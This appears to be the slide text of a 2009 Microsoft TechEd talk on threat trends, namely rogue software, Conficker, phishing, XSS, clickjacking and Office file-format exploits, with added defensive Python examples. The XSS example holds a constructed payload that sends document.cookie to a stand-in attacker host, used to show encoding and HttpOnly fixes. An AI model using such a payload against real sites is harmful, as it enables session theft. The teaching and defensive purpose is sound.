Graham Calladine, David Hoyle, Security Center of Excellence, Microsoft. Session Code: SIA313
Session Objectives & Takeaways
To learn and understand:
- Current attack trends that Microsoft is seeing
- Attack vectors
- Mitigation strategies with Windows products
10 Years…
We have come a long way since Melissa.
2003-2004 were difficult times: Blaster and Slammer were horrible and hit home users hard.
Conficker emerged in a different software industry and did not hit home users hard.
Partnerships: the MS Response Alliance, the Industry Consortium for Advancement of Security on the Internet (ICASI) and the Conficker Working Group (CWG).
WW Threat Trends
Not a simple trend; it is geographically diverse.
- Miscellaneous trojans (including rogue software) are the most prevalent category
- Worms are the 2nd most prevalent
- Password stealers and monitoring tools follow
Breaches: data is scarce (datalossdb.org). The top cause is stolen equipment, with twice as many incidents as intrusion. But equipment loss is easy to report, which skews the figures!
Data: Microsoft SIR v7 Report
Geographical Trends
The 8 locations with the most infected machines:
- USA, UK, France, Italy: trojans
- China: language-specific browser threats
- Brazil: malware targeting online banking
- Spain, Korea: worms targeting online gamers
Data source: SIR v7 report, p. 40
Threat Landscape is getting better?
Improvement in software development practice: the Security Development Lifecycle (SDL) (Geoff, 1-min video).
Increased availability of automatic patch updates: Patch Tuesday and Auto Updates.
However, an unpatched client is still the primary initial infection vector, and social engineering techniques are used to mislead victims: attackers still find success with a variety of techniques for manipulating people.
SANS Analysis
SANS, "The Top Cyber Security Risks", September 2009:
- Application vulnerabilities exceed OS vulnerabilities
- Web application attacks: cross-site scripting, PHP file include, and SQL injection
- Windows: Conficker/Downadup
Cited from SANS "The Top Cyber Security Risks", September 2009, http://www.sans.org/top-cyber-security-risks/
Attackers use social engineering techniques that play on human emotion:
- Fear: "I need protection", and what the victim gets is rogue security software
- Desire: fake content, malicious downloads, etc.
- Trust: banking malware, phishing, spam, file-format infections, etc.
Source: Microsoft Security Intelligence Report, July through December 2008
Attack Vectors and Trends
Current attacks in the wild:
- Rogue security software and worms
- Browser-based attacks: phishing, cross-site scripting, clickjacking
- File format attacks
Rogue Unwanted Software

Rank | Family | Most Significant Category | Infected Machines
1 | (family name not captured) | Trojan Downloaders & Droppers | 4,371,508
2 | Win32/Zlob | Trojan Downloaders & Droppers | 3,772,217
3 | Win32/Vundo | Miscellaneous Trojans | 3,635,207
4 | Win32/ZangoSearchAssistant | Adware | 3,326,275
5 | Win32/Taterf | Worms | 1,916,446
6 | Win32/ZangoShoppingreports | Adware | 1,752,252
7 | (family name not captured) | Miscellaneous Trojans | 1,691,393
8 | Win32/FakeSecSen | Miscellaneous Trojans | 1,575,648
9 | Win32/Hotbar | Adware | 1,477,886
10 | Win32/Agent | Miscellaneous Trojans | 1,289,178
Rogue Security Software 1
Uses fear to convince victims: the Win32/Renos family.
Rogue Security Software 2
Uses the same logic: the Win32/FakeXPA family.
A Rogue Software Real Sample
http://blogs.technet.com/mmpc/archive/2009/08/20/winwebsec-on-youtube.aspx
Uses your desire. There is no security issue or vulnerability in YouTube.com itself; the lure is the content.
Rogue Software
Win32/FakeVimes and Win32/PrivacyCenter have become more prevalent in the last 2 months. Both are distributed via fake online scanners.
Worms: Win32/Conficker.A to E
Win32/Conficker is a worm that infects other computers across a network by exploiting a vulnerability in the Windows Server service (hosted in SVCHOST.EXE).
On October 23, 2008, Microsoft released critical security update MS08-067. The vulnerability allows remote code execution if an affected system receives a specially crafted Remote Procedure Call (RPC) request.
On November 21, 2008, the first significant worm that exploits MS08-067 was discovered. The first variant discovered, Worm:Win32/Conficker.A, uses only the MS08-067 exploit to propagate.
On December 29, 2008, a significantly more dangerous variant, Win32/Conficker.B, was discovered. It exploits the MS08-067 vulnerability but uses additional methods to propagate: it attempts to spread itself to other computers on the network, combining the vulnerability with social engineering to introduce and spread the worm in an organization.
Continues… http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fConficker
Social engineering: e-mailing infected files with official-sounding names, such as "Corporate Policy.PDF", to people at a company.
Worms: Win32/Conficker.A to E
Variant D monitors 500 of 50,000 generated domain names per day for payloads… and still does.
The Conficker Working Group (CWG) formed in January 2009, with many people from well-known security groups and researchers. It implemented a defensive DNS strategy: Kaspersky and OpenDNS pre-calculated a year's worth of names, and all 110 TLDs involved signed up. Rapid, effective collaboration keeps Conficker constrained.
Published Articles for Conficker
Knowledge Base article KB962007
MMPC blog (http://blogs.technet.com/mmpc):
- Get Protected, Now! (October 23, 2008)
- A Quick Update About MS08-067 Exploits (November 17, 2008)
- Just in Time for New Year's… (December 31, 2008)
- MSRT Released Today Addressing Conficker and Banload (January 13, 2009)
- Centralized Information About the Conficker Worm (January 22, 2009)
- Information about Worm:Win32/Conficker.D (March 27, 2009)
Mitigations
- Get the latest computer updates
- Install and update anti-malware signatures
- Run an up-to-date scanning and removal tool
- Use caution with attachments and file transfers
- Use caution when clicking on links to web pages
- Run with standard user rights
- Protect yourself from social engineering attacks
- Follow user security best practices, such as a strong password policy
- Keep an eye on vulnerabilities and follow the guidance from trusted sources
- Use recent technologies and systems that reduce the risk of exploitation
Attack Vectors and Trends: Browser Based Attacks
Phishing, Cross Site Scripting, ClickJacking
Phishing: Overview
Phishing is a method of identity theft that tricks Internet users into revealing personal or financial information online.
Phishing Scam Samples
Social engineering techniques:
- "Verify your account"
- "If you don't respond within 48 hours, your account will be closed"
- "Dear Valued Customer"
- "Click the link below to gain access to your account"
Spear Phishing and Whaling
Spear phishing: highly targeted phishing. E-mail messages that appear genuine are sent to all employees and members within a community.
Whaling: targeted attacks on senior executives and other high-ranking people.
Phishing Trends in Industry
APWG: Anti Phishing Working Group Report, 2009 1H http://www.antiphishing.org/reports/apwg_report_h1_2009.pdf
Phish Tank: Current Phish Sites
Live phishing sites can be found at http://www.phishtank.com/
Phishing with Hotmail
Hotmail credentials were illegally acquired through a phishing scheme and exposed on a website. Microsoft recommends:
- Renew Windows Live ID passwords every 90 days
- For administrators, approve and authenticate only users that you know and whose credentials you can verify
- As phishing sites can also pose additional threats, install and keep anti-virus software up to date
Techniques
- Man-in-the-middle attacks: proxies, DNS cache poisoning, etc.
- URL obfuscation attacks: bad domain names, "friendly login" URLs, host name/URL obfuscation, etc.
- Etc…
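The URL-obfuscation tricks just listed can be caught mechanically before a link ever reaches a user. The checker below is an added example and is not part of the deck; the trusted domains, brand tokens and sample URLs in it are constructed, and registrable_domain is a deliberately naive stand-in for a public-suffix lookup. It flags credentials in the authority ("friendly login" URLs, where everything before the @ is a throw-away username), hostnames written as dword, hex or octal integers, a brand name buried in an untrusted domain, punycode labels, and redirect parameters carrying a second URL.

```python
"""Added example, not from the deck: flag common phishing URL obfuscation."""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed: the registrable domains we consider legitimate, and the brand
# tokens phishers like to embed in look-alike hostnames.
TRUSTED_DOMAINS = {"example-bank.com", "example.com"}
BRAND_TOKENS = ("example-bank", "examplebank")


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Naive stand-in for a public-suffix lookup,
    which real code should use (think co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def decode_numeric_host(host: str):
    """Return the IPv4Address hidden in a dotted, dword (3405803781),
    hex (0xcb007105) or octal (031300070405) hostname, else None."""
    host = host.lower()
    try:
        return ipaddress.IPv4Address(host)          # plain dotted decimal
    except ValueError:
        pass
    try:
        if re.fullmatch(r"0x[0-9a-f]+", host):
            return ipaddress.IPv4Address(int(host, 16))
        if re.fullmatch(r"0[0-7]+", host):
            return ipaddress.IPv4Address(int(host, 8))
        if re.fullmatch(r"[0-9]+", host):
            return ipaddress.IPv4Address(int(host))
    except ValueError:                              # outside the 32-bit range
        pass
    return None


def analyze_url(url: str) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()

    # http://www.example-bank.com@203.0.113.5/ : the part before '@' is a
    # username the browser discards; the real host is what follows it.
    if parts.username is not None:
        findings.append("credentials in authority (friendly-login URL), real host is %s" % host)

    ip = decode_numeric_host(host)
    if ip is not None:
        findings.append("numeric host %s -> %s" % (host, ip))
    else:
        domain = registrable_domain(host)
        if domain not in TRUSTED_DOMAINS and any(tok in host for tok in BRAND_TOKENS):
            findings.append("brand name inside untrusted domain %s" % domain)
        if any(label.startswith("xn--") for label in host.split(".")):
            findings.append("punycode (IDN) label in host %s" % host)

    # A trusted site redirecting to an attacker URL still looks trusted in the mail client.
    for key, values in parse_qs(parts.query).items():
        for value in values:
            if re.match(r"https?://", value, re.IGNORECASE):
                findings.append("embedded URL in parameter %s" % key)
    return findings


if __name__ == "__main__":
    for sample in ("https://www.example-bank.com/login",
                   "http://www.example-bank.com@203.0.113.5/login",
                   "http://0xCB007105/", "http://3405803781/",
                   "http://www.example-bank.com.login-verify.example/",
                   "https://www.example.com/redir?u=http://203.0.113.5/x"):
        print(sample, "->", analyze_url(sample) or "clean")
```

The numeric-host decoding is worth keeping even though browsers differ in which forms they accept: a mail filter that only understands dotted-decimal will wave the dword form straight through.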
Anti-Phishing
IE 8 SmartScreen
Mitigations
Use an up-to-date anti-malware product from a known, trusted source, and keep it updated.
Use the most recent version of your Web browser, and keep it up to date by applying security updates and service packs in a timely fashion.
Use a robust spam filter to guard against fraudulent and dangerous e-mail.
Add sites you trust to the Trusted Sites zone, and keep that zone's security level at Medium or higher. Follow the guidance at http://www.microsoft.com/mscorp/safety/technologies/antiphishing/guidance.mspx
Cross Site Scripting: Overview
Cross-Site Scripting (XSS) occurs whenever an application reads user data and embeds it in web responses without encoding or validating it.
Common weaknesses that make web applications susceptible to cross-site scripting attacks:
- Improper input validation
- Failing to encode output
- Trusting data from shared resources
Cross Site Scripting in News
- October 2005: MySpace "Samy" worm
- February 2006: Facebook
- June 2008: Yahoo Mail
- December 2008: American Express
- April 2009: Twitter (http://twittercism.com/remove-stalkdaily/)
http://xssed.com/ - live XSSed
Types of Cross-Site Scripting
Two major types of cross-site scripting attack:
- Type 1: Non-persistent, often referred to as reflected cross-site scripting. Requires some level of social engineering to get the victim to follow the crafted link.
- Type 2: Persistent, or stored cross-site scripting. One attack can affect multiple users.
There is also Type 0: DOM-based, where the injection happens in client-side script rather than in the server's response.
Type 1: Non-Persistent Cross-Site Scripting
[Diagram: the malicious user sends the victim a lure ("Congratulations! You won a prize, please click here to claim your prize!") whose link carries id=[malicious code]; the web server reflects the id parameter into its response, so the code runs in the victim's browser.]
Type 2: Persistent Cross-Site Scripting
[Diagram: the malicious user posts a blog comment ("Hello, this article was helpful! [malicious code] Thanks, Kevin"); the web server stores it in the database and serves it back to every user who later reads the page.]
Mitigation Strategies
Server side:
- Validate all untrusted input
- Encode any web response data that could contain user or other untrusted input
- Use the built-in ASP.NET protection via the ValidateRequest option (a blunt first line of defence, not a substitute for output encoding)
- Use the System.Web.HttpCookie.HttpOnly property so script cannot read session cookies
- Use the ,
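The two diagrams above and the server-side list map directly onto code. The following is an added example and not code from the deck or from the AntiXSS library: it uses Python's html.escape as a stand-in for the library's encoders, and the pages, the cookie-stealing payload and the in-memory comment store are constructed. It shows the reflected (Type 1) and stored (Type 2) cases side by side with their encoded versions, a whitelist validator for the id parameter, and a Set-Cookie header carrying HttpOnly so that even injected script cannot read the session cookie.

```python
"""Added example, not from the deck: reflected and stored XSS beside the fixes."""
import re
from html import escape
from http.cookies import SimpleCookie

# Constructed payload: ships document.cookie to the attacker if it runs.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def prize_page_unsafe(user_id: str) -> str:
    """Type 1 (reflected): the id parameter is copied into the response as-is."""
    return "<h1>Congratulations, user %s! Click here to claim your prize</h1>" % user_id


def prize_page_encoded(user_id: str) -> str:
    """Fix: encode on output, so the browser renders the payload as text."""
    return "<h1>Congratulations, user %s! Click here to claim your prize</h1>" % escape(user_id, quote=True)


def valid_user_id(user_id: str) -> bool:
    """Fix: validate untrusted input against a whitelist (ids are 1-10 digits).
    Done in addition to encoding, never instead of it."""
    return re.fullmatch(r"[0-9]{1,10}", user_id) is not None


class BlogComments:
    """Type 2 (stored): comments persist and are served to every later reader."""

    def __init__(self):
        self._rows = []                      # constructed stand-in for the database

    def post(self, author: str, body: str) -> None:
        self._rows.append((author, body))

    def render_unsafe(self) -> str:
        return "".join("<p>%s<br/>Thanks, %s</p>" % (body, author) for author, body in self._rows)

    def render_safe(self) -> str:
        # Encode every stored field at the point it is written into HTML.
        return "".join("<p>%s<br/>Thanks, %s</p>" % (escape(body), escape(author))
                       for author, body in self._rows)


def contains_script_tag(html_out: str) -> bool:
    """Crude oracle: did a raw <script tag reach the output?"""
    return "<script" in html_out.lower()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie with HttpOnly (and Secure): script in the page, injected or
    not, cannot read it, so the payload above would steal nothing."""
    jar = SimpleCookie()
    jar["ASP.NET_SessionId"] = session_id
    morsel = jar["ASP.NET_SessionId"]
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["path"] = "/"
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(prize_page_unsafe(PAYLOAD))
    print(prize_page_encoded(PAYLOAD))
    comments = BlogComments()
    comments.post("Kevin", "Hello, this article was helpful! " + PAYLOAD)
    print(comments.render_unsafe())
    print(comments.render_safe())
    print(session_cookie_header("abc123"))
```

HttpOnly does not stop the injected script from acting as the user (posting a form, changing a password), it only denies it the cookie; output encoding is what removes the injection itself.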
Microsoft Anti-Cross Site Scripting Library V3.1
New features:
- An expanded white list that supports more languages
- Performance improvements, with performance data sheets in the online help
- Support for Shift_JIS encoding for mobile browsers
- A sample application
- Security Runtime Engine (SRE) HTTP module
Security Runtime Engine (SRE) HTTP module
Ideally, you do not need to change your code!
In your web.config, register the HTTP module: the entry's type is SecurityRuntimeEngine.AntiXssModule.
In antixssmodule.config, configure which pages and controls the module encodes.
Anti-Cross Site Scripting in Action
Microsoft Anti-Cross Site Scripting Library V3.1
Mitigation Strategies
Client side: IE8 XSS Filter
Anti-Cross Site Scripting in Action
IE8 XSS Filter with Microsoft Application Compatibility Tool Kit
ClickJacking: Overview
Clickjacking is an attack that tricks the victim into initiating commands on a website that they did not intend. It uses iframes and web page layers in DHTML to overlay a potentially malicious button (for example) on an existing legitimate web page, so that a click on what the victim sees lands on a control the victim does not see.
A ClickJacking Example
Suppose that a hacker site has the following source code…
Mitigation
- Use a frame-breaker script: page-level script that navigates the top window to the page itself when it detects that it is framed. A determined framing page can defeat frame-busting script, so treat it as a fallback, not the primary control.
- Use the X-Frame-Options header (honoured by IE8): an HTTP response header named X-FRAME-OPTIONS whose value is the token DENY, meaning the content will not be displayed within a frame. (SAMEORIGIN, which permits framing only by pages from the same origin, is the other defined token.)
- Deliver it as a real HTTP response header: through IIS Manager, through the customHeaders section of web.config, or from code with Response.AddHeader("X-Frame-Options", "DENY").
Caveat: X-Frame-Options is only honoured as an HTTP response header; a <meta http-equiv="X-Frame-Options" content="DENY" /> tag in the page is ignored by browsers.
ClickJacking: FrameBreaker and IE8 Defense (demo)
Attack Vectors and Trends: File Format Attack (Office)
File Format Attack: Overview
This class of vulnerability is described as parser vulnerabilities: the attacker creates a specially crafted document that takes advantage of an error in how the code processes or parses the file format.
Increasingly, attackers are using common file formats as transmission vectors for exploits, chiefly the Office formats and PDF.
File Format Attack Trend
The second half of 2008 (2H08) saw a sharp increase in the number of file-format-based attacks. They often arrive as spear-phishing and whaling e-mails, where the victim opens the attachment; or a malicious or compromised web site forces the browser to a malicious document, which the victim then opens.
Binary Office File Format vs. Open XML format
Office 2003 (and lower) binary format: the outer format is OLE Structured Storage, a file system within a file! It is a complex format complete with a FAT table, sectors and streams (which behave like files). Inside a stream sits another, application-specific inner format.
[Diagram: a header followed by sectors belonging to interleaved streams STRM1, STRM3, STRM2, STRM4.]
Examining The File
Requires a hex editor plus expert knowledge. Interesting strings turn up in a stream near the beginning of the malicious files!
What could possibly go wrong?
Office 2007 Open XML File Format
- Safety was a design goal from the beginning; designed under the SDL
- ZIP file container with 'XML parts'
- Also non-XML parts (typically binary data like embedded images or OLE objects); non-XML parts can be disabled by policy
- Rename to .zip and open with a zip file viewer!
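The "examining the file" step for both containers can be scripted. What follows is an added example and not tooling from the deck: it tells the OLE structured-storage container from the Open XML ZIP container by their signatures, decodes the fields of the 512-byte OLE header that a hex-editor walk-through starts from (version, sector size, FAT and directory locations), dumps the printable strings a triager looks for, and lists the non-XML parts of an Open XML package. Both sample files are built in memory and the "interesting string" is a harmless constructed marker; the OLE sample is only as complete as the header parser needs (no directory entries).

```python
"""Added example, not from the deck: first-pass triage of an Office attachment."""
import io
import re
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # compound file signature
ZIP_MAGIC = b"PK\x03\x04"                          # local file header of a ZIP
FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF


def classify(data: bytes) -> str:
    if data.startswith(OLE_MAGIC):
        return "ole"          # binary .doc/.xls/.ppt: a file system within a file
    if data.startswith(ZIP_MAGIC):
        return "openxml"      # .docx/.xlsx/.pptx: ZIP container of parts
    return "unknown"


def parse_ole_header(data: bytes) -> dict:
    """Decode the 512-byte compound-file header (all fields little-endian)."""
    if len(data) < 512 or not data.startswith(OLE_MAGIC):
        raise ValueError("not an OLE compound file")
    _minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", data, 0x18)
    (num_fat, first_dir, _txn, mini_cutoff,
     _first_minifat, _num_minifat, _first_difat, num_difat) = struct.unpack_from("<8I", data, 0x2C)
    sector_size = 1 << sector_shift
    return {
        "major_version": major, "byte_order": byte_order,
        "sector_size": sector_size, "mini_sector_size": 1 << mini_shift,
        "num_fat_sectors": num_fat, "first_dir_sector": first_dir,
        "mini_stream_cutoff": mini_cutoff, "num_difat_sectors": num_difat,
        "sector_count": (len(data) - 512) // sector_size,   # sector 0 follows the header
        "difat_head": list(struct.unpack_from("<4I", data, 0x4C)),
    }


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """ASCII runs worth a second look (URLs, paths, command lines)."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def inspect_open_xml(data: bytes) -> dict:
    """List parts; anything that is not XML (OLE objects, VBA, images) gets scrutiny."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
    non_xml = [n for n in names if not n.lower().endswith((".xml", ".rels"))]
    return {
        "parts": names,
        "non_xml_parts": non_xml,
        "has_vba": any(n.lower().endswith("vbaproject.bin") for n in names),
        "has_ole_objects": any("/embeddings/" in n.lower() for n in names),
    }


def build_sample_ole() -> bytes:
    """Constructed minimal container: header, one FAT sector, an empty
    directory sector and one stream sector holding a marker string."""
    hdr = bytearray(512)
    hdr[:8] = OLE_MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)        # v3, 512-byte sectors
    struct.pack_into("<8I", hdr, 0x2C, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))       # DIFAT: FAT is sector 0
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, ENDOFCHAIN, *([FREESECT] * 125))
    directory = bytes(512)
    stream = b"CONSTRUCTED MARKER: cmd.exe /c calc.exe".ljust(512, b"\0")
    return bytes(hdr) + fat + directory + stream


def build_sample_docx() -> bytes:
    """Constructed Open XML package with an embedded OLE object and a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("_rels/.rels", "<Relationships/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/embeddings/oleObject1.bin", bytes(32))
        z.writestr("word/vbaProject.bin", bytes(32))
    return buf.getvalue()


if __name__ == "__main__":
    ole = build_sample_ole()
    print(classify(ole), parse_ole_header(ole), printable_strings(ole))
    docx = build_sample_docx()
    print(classify(docx), inspect_open_xml(docx))
```

The signature check is the same one "rename to .zip" relies on, and it also catches the mislabelled case: a .docx that starts with the OLE magic is a binary document wearing the wrong extension.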
Historical Data
Office Security Bulletin Trend (by quarter)
[Chart: number of Office security bulletins per quarter, 2004 Q1 through 2008 Q2.]
Newer is better: of the vulnerabilities published since January 2007, 28% affect Office 2007 and 72% do not.
Layered Defenses
Harden the Attack Surface
Security engineering:
- Security Development Lifecycle foundation
- Intensive distributed fuzzing
Integrate OS advances:
- Support for DEP/NX
- Leverage WIC image parsers
- Robust and agile cryptography
Reduce the Attack Surface
File Block:
- Block unused or legacy file formats
- Easy policy enforcement
- "View" allows read-only access, tied in with Protected View for formats between block and allow
Office File Validation:
- Binary files
- Runs automatically on open
- Evaluates the file for 'correctness'
- Protects against unknown exploits
- Faster updates for changes to rules
Gatekeeper vs MSRC cases
Protected Viewer ‘Sandbox’
Word, Excel and PowerPoint files can run in the 'sandbox', which prevents harmful documents from damaging user data and the OS and helps users make better trust decisions.
Protected Viewer
Office - FileFormats
Observations on XP
1. The malicious PPT drops an EXE and a clean PPT on the user's desktop (requires regular user rights)
2. The EXE creates a '.log' file in the user's temp folder and executes it (requires regular user rights)
3. The malware creates 2 binaries in system32 and modifies HKLM registry keys (requires admin rights)
4. The binaries are injected into SYSTEM processes like winlogon.exe (requires admin rights)
Observations on Vista
The same four steps with the same rights requirements: steps 1 and 2 need only regular user rights, steps 3 and 4 need admin rights.
Better Together
File Block GateKeeper Standard User / UAC UAC “Dark Roast”
Mitigations
Configure your computer to use Microsoft Update. Ensure that Microsoft security update MS06-027 has been applied to any affected software in your environment: http://www.microsoft.com/technet/security/bulletin/MS06-027.mspx
Keep your third-party software up to date. Updates for Adobe products can be downloaded from http://www.adobe.com/downloads/updates/. If possible, upgrade your software applications to the most recent versions, since these see lower rates of attack.
Avoid opening attachments or clicking links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.
Use up-to-date antivirus software from a known, trusted source that offers real-time protection and continually updated definition files to detect and block exploits.
Summary
The trends are worms, rogue software and file-format attacks, and they vary worldwide. The security community works together across the industry to keep on top. Technology is evolving fast to solve the root cause (GateKeeper). Updates, virus checkers and good risk management are key; security standards and lockdowns go a long way.
Quick Case Study
- AppLocker with Windows-only rules plus application rules: no execute for standard users from writable areas
- BitLocker
- Lockdown to reduce the attack surface
- Virus checker, updates, etc.
Gives a solid defense-in-depth client build!
Summary
Both security vendors and IT professionals should:
- Adjust their risk management processes appropriately to help ensure that all operating systems and applications are protected (ISO 27000, COBIT, the Microsoft Security Risk Management Guide)
- Keep up with the wide range of potential security issues
- Take appropriate actions based on their risk assessment
As individuals protecting against malicious code:
- Keep security patches and anti-virus signatures up to date, and if possible upgrade to newer software
- Educate yourself about potential security risks
IT professionals and consumers should take advantage of the defense-in-depth technologies, such as firewalls, antivirus programs and antispyware programs, available from trusted sources…
Summary
Most important of all… stay informed and up to date: Microsoft Malware Protection Center, Microsoft Security Update Guide, Microsoft Security Engineering Center, Microsoft Security Response Center, Microsoft SIR v7 Report, Microsoft AV (Security Essentials), End to End Trust, Microsoft Security Development Lifecycle.
Track Resources
- Common Vulnerabilities and Exposures: http://cve.mitre.org
- National Vulnerability Database: http://nvd.nist.gov
- www.securityfocus.com, www.secunia.com, www.securitytracker.com
Resources
www.microsoft.com/teched Sessions On-Demand & Community www.microsoft.com/learning Microsoft Certification & Training Resources http://microsoft.com/technet Resources for IT Professionals http://microsoft.com/msdn Resources for Developers
Related Content
SIA-205: SDL-Agile: Microsoft’s Approach to Security for Agile Projects
© 2009 Microsoft Corporation. All rights reserved. Microsoft, Windows, Windows Vista and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries.
The information herein is for informational purposes only and represents the current view of Microsoft Corporation as of the date of this presentation. Because Microsoft must respond to changing market conditions, it should not be interpreted to be a commitment on the part of Microsoft, and Microsoft cannot guarantee the accuracy of any information provided after the date of this presentation. MICROSOFT MAKES NO WARRANTIES, EXPRESS, IMPLIED OR STATUTORY, AS TO THE INFORMATION IN THIS PRESENTATION.